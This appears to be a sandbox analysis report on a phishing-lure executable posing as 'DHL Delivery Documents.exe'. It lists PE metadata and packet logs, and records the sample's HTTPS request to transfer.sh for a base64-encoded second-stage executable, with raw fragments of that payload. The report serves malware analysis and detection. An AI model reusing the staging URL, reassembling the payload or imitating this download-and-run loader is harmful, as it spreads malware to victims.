                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x37e00x3800False0.435965401786data5.4642521586IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x60000x83280x8400False0.587446732955data6.83628691595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x61c00x468GLS_BINARY_LSB_FIRST
                        RT_ICON0x66280x1128data
                        RT_ICON0x77500x2668data
                        RT_ICON0x9db80x40a2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                        RT_GROUP_ICON0xde5c0x3edata
                        RT_VERSION0xde9c0x2a0data
                        RT_MANIFEST0xe13c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright 2022
                        Assembly Version1.0.0.0
                        InternalNameBNCXGAS.exe
                        FileVersion1.0.0.0
                        ProductNameBNCXGAS
                        ProductVersion1.0.0.0
                        FileDescriptionBNCXGAS
                        OriginalFilenameBNCXGAS.exe

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 14:03:28.264552116 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.264620066 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.264719009 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.520648003 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.520692110 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.610454082 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.610636950 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.614259005 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.614284992 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.614578962 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.671480894 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.989583015 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.029881001 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354017973 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354074001 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354084969 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354152918 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354182005 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354185104 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354199886 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354222059 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354232073 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354243994 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354269981 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354294062 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354485035 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354500055 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354542971 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354552984 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354582071 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354592085 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354604006 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354641914 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377412081 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377456903 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377516031 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377540112 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377553940 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377646923 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377782106 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377820015 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377871037 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377899885 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377914906 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377954006 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378340960 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378381014 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378426075 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378438950 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378479958 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378498077 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400721073 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400764942 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400840998 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400882006 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400899887 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400934935 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400964022 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400999069 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401032925 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401046991 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401071072 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401098013 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401119947 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401415110 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401453018 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401499987 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401530027 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401540995 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401575089 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401732922 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401768923 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401814938 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401833057 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401906013 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401926041 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402079105 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402122021 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402169943 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402187109 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402199030 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402245998 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402342081 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402381897 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402431011 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402445078 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402477026 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402492046 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424608946 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424653053 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424720049 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424743891 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424792051 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424817085 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425146103 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425185919 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425237894 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425247908 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425298929 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425792933 CET44349751144.76.136.153192.168.2.3

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 14:03:28.227101088 CET5391053192.168.2.38.8.8.8
                        Jan 28, 2022 14:03:28.246570110 CET53539108.8.8.8192.168.2.3

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 28, 2022 14:03:28.227101088 CET192.168.2.38.8.8.80x9264Standard query (0)transfer.shA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 28, 2022 14:03:28.246570110 CET8.8.8.8192.168.2.30x9264No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • transfer.sh

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.349751144.76.136.153443C:\Users\user\Desktop\DHL Delivery Documents.exe
                        TimestampkBytes transferredDirectionData
                        2022-01-28 13:03:28 UTC0OUTGET /get/mVKia7/BINCC.txt HTTP/1.1
                        Host: transfer.sh
                        Connection: Keep-Alive
                        2022-01-28 13:03:29 UTC0INHTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 223232
                        Connection: close
                        Content-Disposition: attachment; filename="BINCC.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 9
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        2022-01-28 13:03:29 UTC0INData Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 39 5a 6a 38 62 4f 51 64 52 53 44 6b 48 55 55 67 35 42 31 46 49 49 70 72 36 53 48 55 48 55 55 67 69 6d 73 39 49 4f 67 64 52 53 43 4b 61 7a 45 67 34 42 31 46 49 55 6d 6c 6a 61 44 6b 48 55 55 67 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 45
                        Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB9Zj8bOQdRSDkHUUg5B1FIIpr6SHUHUUgims9IOgdRSCKazEg4B1FIUmljaDkHUUgAAAAAAAAAAFBFAABMAQE
                        2022-01-28 13:03:29 UTC16INData Raw: 65 59 41 2f 77 44 2f 77 63 45 49 67 65 48 2f 41 50 38 41 43 2f 47 42 66 52 51 41 41 51 41 41 69 58 49 63 44 34 55 55 41 51 41 41 69 33 55 49 4d 39 75 4a 58 52 43 4c 65 42 67 50 74 70 51 65 42 41 6b 41 41 4d 48 69 45 49 76 50 77 66 6b 51 67 65 48 2f 41 41 41 41 69 30 79 4f 42 49 48 68 41 41 44 2f 2f 7a 50 4b 69 39 66 42 2b 67 69 42 34 76 38 41 41 41 43 4c 56 4a 59 45 67 65 49 41 41 50 38 41 77 65 45 49 4d 38 71 4c 31 38 48 36 47 49 48 69 2f 77 41 41 41 41 2b 32 56 4a 59 46 4d 38 71 4c 31 34 48 69 2f 77 41 41 41 49 74 55 6c 67 53 42 34 67 44 2f 41 41 41 7a 79 6a 4e 49 2f 49 73 51 4d 39 47 4a 53 42 79 4c 53 41 51 7a 79 6f 6c 51 49 49 74 51 43 44 50 52 69 55 67 6b 69 56 41 6f 67 2f 73 47 44 34 53 4a 41 41 41 41 69 38 72 42 2b 52 69 42 34 66 38 41 41 41 43 4c
                        Data Ascii: eYA/wD/wcEIgeH/AP8AC/GBfRQAAQAAiXIcD4UUAQAAi3UIM9uJXRCLeBgPtpQeBAkAAMHiEIvPwfkQgeH/AAAAi0yOBIHhAAD//zPKi9fB+giB4v8AAACLVJYEgeIAAP8AweEIM8qL18H6GIHi/wAAAA+2VJYFM8qL14Hi/wAAAItUlgSB4gD/AAAzyjNI/IsQM9GJSByLSAQzyolQIItQCDPRiUgkiVAog/sGD4SJAAAAi8rB+RiB4f8AAACL
                        2022-01-28 13:03:29 UTC32INData Raw: 63 4e 78 45 43 73 6c 79 64 6c 56 69 2b 79 4c 54 51 69 4c 67 64 67 48 41 41 43 46 77 48 51 53 67 37 68 6b 49 41 41 41 41 48 51 4a 55 65 6a 42 39 76 2f 2f 67 38 51 45 58 63 4f 6f 62 66 53 4b 4f 2f 36 65 74 49 55 4a 42 53 31 56 69 2b 79 42 37 4b 41 43 41 41 43 4c 52 51 79 4c 53 41 68 54 4d 39 74 57 61 50 34 42 41 41 43 4e 68 57 4c 39 2f 2f 38 7a 30 6c 4e 51 69 56 33 51 69 55 33 4d 78 30 57 6b 47 41 41 41 41 49 6c 64 71 49 6c 64 73 49 6c 64 72 49 6c 64 74 49 6c 64 75 47 61 4a 6c 57 44 39 2f 2f 2f 6f 5a 6b 49 42 41 49 74 31 43 49 31 4e 7a 46 47 4e 56 61 52 53 61 41 45 45 41 41 43 4e 52 51 78 51 56 75 69 63 49 41 45 41 67 38 51 67 68 63 41 50 69 50 67 41 41 41 43 4c 68 71 41 4c 41 41 42 58 61 50 64 65 46 4d 78 54 55 31 43 4e 66 68 78 58 78 30 58 55 58 41 42 6c
                        Data Ascii: cNxECslydlVi+yLTQiLgdgHAACFwHQSg7hkIAAAAHQJUejB9v//g8QEXcOobfSKO/6etIUJBS1Vi+yB7KACAACLRQyLSAhTM9tWaP4BAACNhWL9//8z0lNQiV3QiU3Mx0WkGAAAAIldqIldsIldrIldtIlduGaJlWD9///oZkIBAIt1CI1NzFGNVaRSaAEEAACNRQxQVuicIAEAg8QghcAPiPgAAACLhqALAABXaPdeFMxTU1CNfhxXx0XUXABl
                        2022-01-28 13:03:29 UTC48INData Raw: 4d 48 41 42 51 50 47 41 34 53 39 77 50 37 2f 2f 34 6c 64 39 49 32 30 43 4a 6c 35 67 6c 71 4c 54 66 69 4c 52 66 7a 42 79 67 4b 4c 32 59 6c 56 2f 49 6c 31 2b 50 66 54 49 39 45 6a 32 4d 48 47 42 51 76 61 69 31 58 30 41 2f 4d 44 74 4c 33 45 2f 76 2f 2f 69 55 58 30 69 30 58 34 6a 62 51 57 6d 58 6d 43 57 6f 74 56 2f 4d 48 4a 41 6f 50 48 42 59 76 65 69 56 33 34 69 58 33 38 67 2f 38 55 44 34 7a 79 2f 76 2f 2f 76 78 51 41 41 41 44 42 78 67 57 4c 32 6a 50 5a 4d 39 67 44 38 77 4f 30 76 62 54 2b 2f 2f 2b 4c 58 66 54 42 79 41 4b 4a 56 66 53 4e 74 42 36 68 36 39 6c 75 69 31 33 34 69 58 58 34 77 63 59 46 69 39 45 7a 30 44 50 54 41 2f 49 44 74 4c 32 34 2f 76 2f 2f 69 31 58 30 6a 5a 51 57 6f 65 76 5a 62 73 48 4c 41 6f 76 77 4d 38 4f 4a 54 66 53 4c 54 66 67 7a 77 59 6c 56
                        Data Ascii: MHABQPGA4S9wP7//4ld9I20CJl5glqLTfiLRfzBygKL2YlV/Il1+PfTI9Ej2MHGBQvai1X0A/MDtL3E/v//iUX0i0X4jbQWmXmCWotV/MHJAoPHBYveiV34iX38g/8UD4zy/v//vxQAAADBxgWL2jPZM9gD8wO0vbT+//+LXfTByAKJVfSNtB6h69lui134iXX4wcYFi9Ez0DPTA/IDtL24/v//i1X0jZQWoevZbsHLAovwM8OJTfSLTfgzwYlV
                        2022-01-28 13:03:29 UTC64INData Raw: 32 67 41 49 41 41 41 56 75 68 4d 35 41 41 41 4d 38 6d 44 78 41 69 46 77 41 2b 56 77 59 6d 47 36 41 63 41 41 46 36 4c 77 59 76 6c 58 63 4f 66 6e 42 6b 79 61 56 57 4c 37 49 48 73 56 41 49 41 41 46 59 7a 77 47 67 47 41 67 41 41 55 49 32 4e 72 76 33 2f 2f 31 46 6d 69 59 57 73 2f 66 2f 2f 36 4a 76 69 41 41 44 6f 68 52 55 42 41 46 44 6f 49 4f 67 41 41 49 74 31 43 49 50 45 45 49 6d 47 33 44 34 41 41 4f 6a 71 2b 51 41 41 69 30 41 44 68 63 41 50 68 49 38 43 41 41 41 39 69 49 69 49 69 41 2b 45 68 41 49 41 41 46 64 71 50 31 61 4a 68 74 67 48 41 41 43 4e 76 70 51 4d 41 41 44 6f 70 48 34 41 41 49 75 57 70 41 77 41 41 46 42 71 41 47 6f 41 55 6c 66 6f 55 6e 38 41 41 47 70 41 56 6f 6d 47 73 41 77 41 41 4f 69 45 66 67 41 41 55 49 75 47 70 41 77 41 41 47 6f 41 61 67 42 51
                        Data Ascii: 2gAIAAAVuhM5AAAM8mDxAiFwA+VwYmG6AcAAF6LwYvlXcOfnBkyaVWL7IHsVAIAAFYzwGgGAgAAUI2Nrv3//1FmiYWs/f//6JviAADohRUBAFDoIOgAAIt1CIPEEImG3D4AAOjq+QAAi0ADhcAPhI8CAAA9iIiIiA+EhAIAAFdqP1aJhtgHAACNvpQMAADopH4AAIuWpAwAAFBqAGoAUlfoUn8AAGpAVomGsAwAAOiEfgAAUIuGpAwAAGoAagBQ
                        2022-01-28 13:03:29 UTC80INData Raw: 2b 68 43 73 67 41 41 67 38 51 49 58 37 67 42 41 41 41 41 58 6f 76 6c 58 63 50 48 4f 78 46 74 56 59 76 73 56 6f 74 31 43 46 62 6f 4d 37 55 41 41 41 50 41 55 46 62 6f 61 72 49 41 41 49 74 46 44 47 6f 41 55 46 62 6f 6a 72 59 41 41 46 62 6f 47 4c 55 41 41 49 50 45 48 47 61 44 66 45 62 2b 58 48 51 53 56 75 67 48 74 51 41 41 75 56 77 41 41 41 43 44 78 41 52 6d 69 51 78 47 56 75 6a 31 74 41 41 41 75 69 6f 41 41 41 43 44 78 41 52 6d 69 52 52 47 58 6c 33 44 64 66 6a 4f 6f 64 59 61 56 59 76 73 56 6f 74 31 43 46 64 57 36 4e 4b 30 41 41 41 44 77 46 42 57 36 41 6d 79 41 41 43 4c 52 51 78 71 41 46 42 57 36 43 32 32 41 41 42 57 36 4c 65 30 41 41 43 4c 66 52 43 44 78 42 78 6d 67 33 78 47 2f 6c 78 30 47 47 61 44 50 31 78 30 45 6c 62 6f 6e 62 51 41 41 4c 6c 63 41 41 41 41
                        Data Ascii: +hCsgAAg8QIX7gBAAAAXovlXcPHOxFtVYvsVot1CFboM7UAAAPAUFboarIAAItFDGoAUFbojrYAAFboGLUAAIPEHGaDfEb+XHQSVugHtQAAuVwAAACDxARmiQxGVuj1tAAAuioAAACDxARmiRRGXl3DdfjOodYaVYvsVot1CFdW6NK0AAADwFBW6AmyAACLRQxqAFBW6C22AABW6Le0AACLfRCDxBxmg3xG/lx0GGaDP1x0ElbonbQAALlcAAAA
                        2022-01-28 13:03:29 UTC96INData Raw: 52 68 71 41 47 6f 56 56 6c 66 6f 36 78 73 41 41 49 50 45 45 49 58 41 64 51 5a 66 58 6f 76 6c 58 63 4e 66 75 41 45 41 41 41 42 65 69 2b 56 64 77 32 4b 61 47 6c 57 4c 37 49 50 73 4d 44 50 41 56 6f 74 31 44 4d 5a 46 38 41 43 4a 52 66 47 4a 52 66 57 4a 52 66 6c 6d 69 55 58 39 69 45 58 2f 5a 6f 6c 46 30 49 6c 46 30 6f 6c 46 31 6f 6c 46 32 6f 6c 46 33 6f 6c 46 34 6f 6c 46 35 6f 6c 46 36 6d 61 4a 52 65 36 46 39 67 2b 45 79 77 41 41 41 49 74 47 43 49 50 34 41 6e 55 2b 44 37 64 57 45 49 74 31 43 49 31 4e 38 46 46 71 43 47 6f 41 55 6f 31 47 48 46 44 6f 43 6f 51 41 41 49 31 4e 38 46 47 4e 56 64 42 53 36 4c 32 49 41 41 43 4c 6a 67 51 4b 41 41 42 71 41 49 31 46 30 46 42 52 36 42 75 47 41 41 43 4e 56 64 42 53 36 30 43 44 2b 41 52 31 55 49 74 4f 45 49 74 31 43 49 31 46
                        Data Ascii: RhqAGoVVlfo6xsAAIPEEIXAdQZfXovlXcNfuAEAAABei+Vdw2KaGlWL7IPsMDPAVot1DMZF8ACJRfGJRfWJRflmiUX9iEX/ZolF0IlF0olF1olF2olF3olF4olF5olF6maJRe6F9g+EywAAAItGCIP4AnU+D7dWEIt1CI1N8FFqCGoAUo1GHFDoCoQAAI1N8FGNVdBS6L2IAACLjgQKAABqAI1F0FBR6BuGAACNVdBS60CD+AR1UItOEIt1CI1F
                        2022-01-28 13:03:29 UTC112INData Raw: 66 78 2f 5a 32 4b 54 50 7a 76 41 5a 49 43 38 43 39 2b 31 49 55 75 75 64 70 63 39 79 6f 47 37 56 43 4d 2b 55 4c 57 67 49 47 47 41 65 6f 64 69 74 6b 61 4c 68 69 4b 2b 58 58 35 31 7a 34 73 39 68 4e 4f 58 49 6d 6d 51 34 47 6c 36 33 56 61 49 47 59 35 70 55 50 51 46 51 62 47 4d 4b 6e 48 68 4b 45 6f 36 43 58 6e 73 54 65 45 38 48 53 66 78 67 38 4a 4c 4c 6c 4d 31 39 37 4b 32 4c 66 6b 49 73 70 63 36 62 55 48 2b 2f 6f 58 56 59 2f 33 55 68 43 73 7a 30 35 2f 45 30 79 4f 75 64 78 74 72 61 73 35 4a 4d 53 4b 77 58 77 57 72 58 7a 55 4d 73 6c 36 4d 62 48 52 4b 55 5a 49 58 7a 6a 51 6d 65 79 52 6b 52 6d 45 32 6b 66 2b 72 72 66 48 50 74 73 55 58 52 58 75 48 4f 68 54 73 48 4e 73 76 44 64 4d 42 36 46 58 6a 6a 71 46 2f 79 4b 52 4a 34 74 35 6e 79 30 6f 58 35 50 55 71 42 70 64 50
                        Data Ascii: fx/Z2KTPzvAZIC8C9+1IUuudpc9yoG7VCM+ULWgIGGAeoditkaLhiK+XX51z4s9hNOXImmQ4Gl63VaIGY5pUPQFQbGMKnHhKEo6CXnsTeE8HSfxg8JLLlM197K2LfkIspc6bUH+/oXVY/3UhCsz05/E0yOudxtras5JMSKwXwWrXzUMsl6MbHRKUZIXzjQmeyRkRmE2kf+rrfHPtsUXRXuHOhTsHNsvDdMB6FXjjqF/yKRJ4t5ny0oX5PUqBpdP
                        2022-01-28 13:03:29 UTC128INData Raw: 41 43 44 78 41 68 66 58 6c 75 4c 35 56 33 44 61 67 53 4e 52 64 78 51 6a 55 38 42 6a 56 63 53 55 63 64 46 33 43 4d 41 41 41 43 4a 56 64 6a 6f 51 43 49 41 41 47 6f 45 6a 56 58 59 55 6f 31 48 42 6c 44 6f 4d 53 49 41 41 47 6f 45 6a 55 59 55 55 49 31 50 44 46 48 47 52 77 76 71 36 42 34 69 41 41 43 4c 56 66 78 53 5a 73 64 48 45 44 4d 41 55 38 64 47 45 41 45 41 41 41 44 6f 35 79 45 41 41 49 50 45 4c 46 39 65 57 34 76 6c 58 63 4d 54 65 50 45 36 4b 79 5a 41 67 76 6b 53 76 6f 50 4c 56 59 76 73 69 30 55 49 69 30 67 51 56 6d 6f 48 61 67 42 52 6a 62 43 38 43 77 41 41 56 6c 44 6f 39 42 49 41 41 49 74 56 47 49 74 46 46 49 74 4e 45 49 50 45 46 46 4b 4c 56 51 78 51 69 77 5a 52 55 76 2f 51 58 6c 33 44 58 4e 70 38 4e 47 46 51 7a 57 6d 4e 71 31 57 4c 37 49 74 46 43 49 74 49
                        Data Ascii: ACDxAhfXluL5V3DagSNRdxQjU8BjVcSUcdF3CMAAACJVdjoQCIAAGoEjVXYUo1HBlDoMSIAAGoEjUYUUI1PDFHGRwvq6B4iAACLVfxSZsdHEDMAU8dGEAEAAADo5yEAAIPELF9eW4vlXcMTePE6KyZAgvkSvoPLVYvsi0UIi0gQVmoHagBRjbC8CwAAVlDo9BIAAItVGItFFItNEIPEFFKLVQxQiwZRUv/QXl3DXNp8NGFQzWmNq1WL7ItFCItI
                        2022-01-28 13:03:29 UTC144INData Raw: 30 45 4a 64 4d 65 46 51 50 6a 2f 2f 38 4e 67 66 56 44 48 68 55 54 34 2f 2f 2b 52 66 42 42 42 78 34 56 49 2b 50 2f 2f 43 31 6c 58 59 38 65 46 54 50 6a 2f 2f 34 71 31 36 68 33 48 68 56 44 34 2f 2f 39 35 72 41 6a 33 78 34 56 55 2b 50 2f 2f 43 4f 4f 74 63 38 65 46 57 50 6a 2f 2f 38 59 65 5a 61 48 48 68 56 7a 34 2f 2f 2f 6e 42 6a 33 4b 78 34 56 67 2b 50 2f 2f 78 43 62 53 4f 73 65 46 5a 50 6a 2f 2f 77 67 7a 2f 4c 4c 48 68 57 6a 34 2f 2f 2f 50 42 6c 56 68 69 49 31 73 2b 50 2f 2f 36 47 76 79 2f 2f 2b 44 78 41 79 4e 68 65 44 33 2f 2f 2b 46 39 6e 51 4b 54 67 2b 32 43 49 31 45 43 41 46 31 39 6f 31 77 41 51 2b 32 41 49 31 56 34 46 4a 51 56 75 68 44 36 2f 37 2f 4d 38 43 44 78 41 77 34 42 6e 51 48 51 49 41 38 42 67 42 31 2b 59 74 64 43 45 42 51 56 6c 50 6f 70 2f 48 2f
                        Data Ascii: 0EJdMeFQPj//8NgfVDHhUT4//+RfBBBx4VI+P//C1lXY8eFTPj//4q16h3HhVD4//95rAj3x4VU+P//COOtc8eFWPj//8YeZaHHhVz4///nBj3Kx4Vg+P//xCbSOseFZPj//wgz/LLHhWj4///PBlVhiI1s+P//6Gvy//+DxAyNheD3//+F9nQKTg+2CI1ECAF19o1wAQ+2AI1V4FJQVuhD6/7/M8CDxAw4BnQHQIA8BgB1+YtdCEBQVlPop/H/
                        2022-01-28 13:03:29 UTC160INData Raw: 50 6c 5a 4a 42 33 4d 75 47 4a 6f 54 50 42 43 6b 56 71 54 58 66 74 6f 67 78 55 73 30 52 75 74 68 58 33 67 59 35 67 6f 2b 74 6b 61 65 77 5a 2f 50 48 51 62 43 76 47 59 4e 57 77 37 7a 33 2b 65 58 43 6f 7a 30 63 71 72 4b 65 6a 79 47 30 41 39 48 36 47 31 79 30 2b 50 51 44 70 4e 76 4b 57 77 58 52 32 52 65 49 54 77 57 64 66 38 4b 62 36 31 71 6f 52 34 4e 6b 64 32 72 72 59 70 69 75 79 4c 73 64 72 52 73 42 6c 2f 33 6c 64 65 64 37 56 51 48 34 43 49 5a 71 71 7a 4a 57 46 7a 49 63 58 64 74 58 72 43 39 54 4b 61 63 46 41 72 46 74 72 7a 49 4b 7a 6e 73 31 4c 4a 62 63 72 52 51 67 49 61 79 50 50 71 53 76 34 50 44 2f 38 69 34 39 2b 41 6d 5a 4a 39 65 48 4b 74 6a 37 7a 63 61 67 34 52 72 70 69 30 57 64 33 59 63 47 2f 32 2f 6b 77 47 62 39 39 66 6d 54 72 4a 4f 2b 55 42 2b 42 72 52
